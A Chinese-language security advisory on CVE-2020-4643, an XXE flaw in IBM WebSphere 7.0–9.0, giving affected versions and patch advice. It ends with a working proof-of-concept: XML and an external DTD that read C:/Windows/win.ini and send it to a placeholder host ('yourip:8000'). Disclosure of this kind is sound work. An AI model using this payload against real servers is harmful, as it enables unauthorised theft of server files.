CVE-2020-4643 IBM WebSphere存在XXE外部实体注入漏洞

漏洞分析:

IBM WebSphere 应用程序服务器7.0、8.0、8.5 和9.0 在处理XML 数据时容易受到XML 外部实体注入(XXE) 攻击。远程攻击者可以利用此漏洞公开敏感信息。IBM Xforce ID:185590。

影响范围:

WebSphere Application Server 7.0版本

WebSphere Application Server 8.0版本

WebSphere Application Server 8.5版本

WebSphere Application Server 9.0版本

修复建议:

官方已经提供的补丁版本列表:

WebSphere 9.0.0.0 - 9.0.5.5版本,建议升级到9.0.5.6以上版本或安装补丁

WebSphere 8.5.0.0 - 8.5.5.17版本,建议升级到8.5.5.19以上版本或安装补丁

WebSphere 8.0.0.0 - 8.0.0.15版本,建议先升级到8.0.0.15版本再安装补丁

WebSphere 7.0.0.0 - 7.0.0.45 版本,建议先升级到7.0.0.45版本再安装补丁

xml如下:
<!DOCTYPE x [  
   <!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini">  
   <!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">  
   %bbb; 
]> 
<definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">  
&ddd; 
</definitions>

 xx.dtd如下:
 <!ENTITY % ccc '<!ENTITY ddd &#39;<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>&#39;>'>%ccc;